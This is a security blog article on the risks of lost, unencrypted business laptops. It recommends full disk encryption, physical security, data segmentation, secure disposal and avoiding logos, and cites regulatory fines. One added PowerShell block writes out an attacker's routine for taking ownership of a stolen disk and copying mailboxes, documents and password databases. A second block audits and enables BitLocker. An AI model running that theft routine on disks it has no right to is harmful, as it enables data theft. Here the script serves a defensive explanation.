"We're missing a laptop!" These are not words an IT admin wants to hear, but the chances are it is going to happen at some point. Unfortunately, data on most SMB laptops is not encrypted, so what exactly does it mean to your company when it does happen?
It means that if the bad guys pull the hard drive from the missing device, attach it to a system they control, run a few commands against the slaved disk to "take ownership" of every file (or simply read the raw disk with a disk editor), then the chances are they can get most of the data off it. A Windows user ID and password only protect the logon session; they do nothing for the bytes on the disk, so on their own they are not adequate protection for data at rest.
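This is what the "take ownership" step looks like in practice. The following is an added example, not code from the original article: it is run from an elevated PowerShell prompt on a machine the attacker controls, with the stolen unencrypted NTFS disk attached. The drive letter D: for the slaved disk and the C:\loot destination are assumptions for the example.

```powershell
# Added example, not part of the original article: the "take ownership" step the
# paragraph describes, as an attacker would run it from an elevated PowerShell prompt
# on their own machine with the stolen (unencrypted) NTFS disk attached.
# Assumptions: the slaved disk shows up as D:, copied data goes to C:\loot.
$Stolen = 'D:\Users'   # assumed drive letter of the attached disk
$Loot   = 'C:\loot'    # assumed destination for the copied data

# NTFS ACLs on the stolen disk reference SIDs from the stolen machine, so the attacker's
# account is initially denied. That is only a speed bump: any local Administrator holds
# SeTakeOwnershipPrivilege and can seize ownership of every object, recursively (/R),
# assigning it to the Administrators group (/A) and auto-answering prompts (/D Y).
takeown.exe /F $Stolen /R /A /D Y | Out-Null

# As owner, rewrite the ACLs: full control for Administrators on every file and folder,
# inherited by children ((OI)(CI)), recursively (/T), continuing past errors (/C).
icacls.exe $Stolen /grant 'Administrators:(OI)(CI)F' /T /C /Q | Out-Null

# Copy everything. Cached mailboxes, browser profiles and documents are the usual targets.
robocopy.exe $Stolen $Loot /E /R:0 /W:0 /NP | Out-Null

# Summarise what the copy contains, by file type, to show how much an unencrypted
# disk gives away: Outlook caches (.pst/.ost), Office documents, PDFs, password databases.
Get-ChildItem -Path $Loot -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object Extension -in '.pst', '.ost', '.docx', '.xlsx', '.pdf', '.kdbx' |
    Group-Object Extension |
    Select-Object Name, Count |
    Sort-Object Count -Descending
```

None of this needs a password from the stolen machine, a single exploit, or any tool beyond what ships with Windows. With the same disk fully encrypted, the three commands succeed against the volume metadata only and the file contents come back as ciphertext.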
Are the thieves going to bother even looking at the stolen laptop or other device? Many years ago the hardware itself would fetch a decent amount on auction sites as "previously owned". With the professionalization of cyber crime, the data on a professional firm's laptop is often worth more than the hardware itself.
Cyber criminals are very aware of the value of purloined data, and a lost laptop can quickly turn into a serious incident. For example, the theft of personal data may lead to an extortion demand or blackmail attempt. Furthermore, regulators and governing bodies are increasingly fining organizations that take a cavalier attitude towards laptop security.
In 2013, The Information Commissioner's Office (ICO) in the UK fined Glasgow City Council £150,000 for the loss of two unencrypted laptops, one of which contained personal details on more than 20,000 people.
In 2014, two entities paid the U.S. Department of Health and Human Services Office for Civil Rights (OCR) $1,975,220 collectively to resolve potential violations of the Health Insurance Portability and Accountability Act (HIPAA) Privacy and Security Rules.
Stolen or lost laptops have become one of the most common business security incidents, according to the 2014 Data Breach Investigations Report by Verizon, and depending on the regulations governing your business, the penalties and costs could be significant. Those costs continue to grow after the regulator has acted, because the individuals whose privacy was violated may seek additional restitution of their own.
These major enforcement actions in the US and UK underscore the significant risk to the security of personal or medical information posed by laptop computers and other mobile devices.
Here are five precautions you can take to limit the damage of a stolen device:
1/ Use full disk encryption
BitLocker, Microsoft's disk encryption, has been bundled with the business editions of Windows since Vista (Ultimate and Enterprise on Vista and Windows 7, Pro and Enterprise on Windows 8 and later); Windows 8.1 additionally turned on device encryption by default on hardware with a TPM that supports connected standby. It takes some work to roll it out across an organization (TPM provisioning, recovery key escrow, a pre-boot PIN policy), but because the capability is already included with the operating system, an organization that leaves it switched off could find itself in a difficult legal position if a data breach occurs. There are also a plethora of third-party solutions. One caveat applies to all of them: full disk encryption only protects a device that is powered off or hibernated. A laptop stolen while running or asleep still has the volume key in memory, so pair encryption with an enforced screen lock and hibernate rather than sleep for travel.
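As an added example (not code from the original article), the following PowerShell audits which fixed volumes are still readable and turns BitLocker on for the operating-system drive with a TPM-sealed key plus an escrowed recovery password. It assumes an elevated session on Windows 8.1 or later Pro/Enterprise with the BitLocker and TrustedPlatformModule modules, a TPM, and a domain-joined machine whose policy allows recovery information to be stored in Active Directory; the two function names are this example's own.

```powershell
# Added example, not part of the original article: audit BitLocker state and enable it
# on the OS drive. Assumes an elevated PowerShell session, Windows 8.1+ Pro/Enterprise,
# a TPM, and AD-backed recovery-key escrow. Function names are this example's own.
Import-Module BitLocker
Import-Module TrustedPlatformModule

function Get-UnprotectedVolume {
    # Fixed volumes whose data is NOT protected right now. Checking VolumeStatus alone
    # is a common mistake: a FullyEncrypted volume with ProtectionStatus Off (suspended,
    # or encrypted under a clear key) is readable by anyone who plugs the disk in.
    Get-BitLockerVolume |
        Where-Object { $_.VolumeType -in 'OperatingSystem', 'Data' } |
        Where-Object { $_.VolumeStatus -ne 'FullyEncrypted' -or $_.ProtectionStatus -ne 'On' } |
        Select-Object MountPoint, VolumeType, VolumeStatus, ProtectionStatus, EncryptionMethod
}

function Enable-OsDriveBitLocker {
    [CmdletBinding()]
    param([string] $MountPoint = $env:SystemDrive)

    $tpm = Get-Tpm
    if (-not ($tpm.TpmPresent -and $tpm.TpmReady)) {
        throw "No usable TPM on $env:COMPUTERNAME; fall back to a startup key or pre-boot password."
    }

    $vol = Get-BitLockerVolume -MountPoint $MountPoint
    if ($vol.ProtectionStatus -eq 'On') {
        Write-Verbose "$MountPoint is already protected"
        return $vol
    }

    # Seal the volume key to the TPM: the drive unlocks only when the measured boot chain
    # matches, so a disk pulled into another machine yields ciphertext. XTS-AES-256 needs
    # Windows 10 1511 or later; use Aes256 on older builds.
    Enable-BitLocker -MountPoint $MountPoint -EncryptionMethod XtsAes256 `
        -TpmProtector -SkipHardwareTest | Out-Null

    # A recovery password is the only way back in after a firmware update or board swap
    # changes the TPM measurements, so add it before the first reboot and escrow it in AD.
    Add-BitLockerKeyProtector -MountPoint $MountPoint -RecoveryPasswordProtector | Out-Null
    $recovery = (Get-BitLockerVolume -MountPoint $MountPoint).KeyProtector |
        Where-Object KeyProtectorType -eq 'RecoveryPassword'
    Backup-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $recovery.KeyProtectorId

    Get-BitLockerVolume -MountPoint $MountPoint
}

# Usage: list what is still exposed, then fix the OS drive.
Get-UnprotectedVolume | Format-Table -AutoSize
Enable-OsDriveBitLocker -Verbose
```

Run Get-UnprotectedVolume as a scheduled compliance check as well as before enablement: the case it catches, a drive that was encrypted and then had protection suspended for an upgrade and never resumed, is exactly as exposed as the unencrypted disk in the scenario above, while looking "encrypted" in any inventory that only records VolumeStatus.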
2/ Physical Security
The traveling or unattended laptop is in one of the riskiest situations any mobile device can find itself in. In public places or even hotel rooms, the corporate laptop or tablet should at best be secured in a safe and at worst stored out of sight. In the office, a security tether should be used, especially if overall access control to the facility is weak or the organization is large.
3/ Data Segmentation
If storing all your data on a USB stick seems like a solution, think again. Your laptop may have an email client installed on it, and a desktop mail client keeps a local copy of the mailbox, so every sensitive document that was ever sent or received as an attachment is sitting on the laptop's disk regardless of where the master copy lives. If you only use web mail and your documents are on an encrypted USB stick, this technique can help you survive a lost or stolen device.
4/ Secure Disposal
It may sound like something out of Mission Impossible, but physical destruction of a device that falls into the wrong hands is best; a drive wipe with secure-erase software should be your minimum. Always keep in mind that the data lives on the hard drive inside the device. For SSDs, a software overwrite is not reliable because of wear leveling and over-provisioning; use the drive's own secure-erase or, if the drive was fully encrypted, destroy the key (cryptographic erase). If you plan on backing up user files or archiving the contents of the old device, first make sure that copy is secured as well.
5/ Avoid Logos
Advertising who you work for may not be the best idea if you are in a high-risk situation like the world's largest hacker convention. That is not the time to bust out your NSA-stickered Panasonic Toughbook.
Ultimately, you need to remember that the security of your mobile device(s) is your responsibility. IT can provide tracking and remote-wipe tools, and stolen property is returned by strangers or located with tracking software all the time. Unfortunately, once a device has been out of your control you have to assume its contents were copied and that malware or a hardware implant may have been added, so treat a returned device as compromised and reimage it rather than put it straight back into service. Be careful.
Ian Thornton-Trump, CSA+, CD, CEH, CNDA, CPM, BA is CTO at Octopi Managed Services Inc. Ian is an ITIL certified Information Technology (IT) consultant with more than 20 years of experience in IT security and information technology. He enjoys and maintains a strong commitment to the security community. From 1989 to 1992, Ian served with the Canadian Forces (CF), Military Intelligence Branch; in 2002, he joined the CF Military Police Reserves and retired as a Public Affairs Officer in 2013.
You can follow Ian on Twitter® at @phat_hobbit.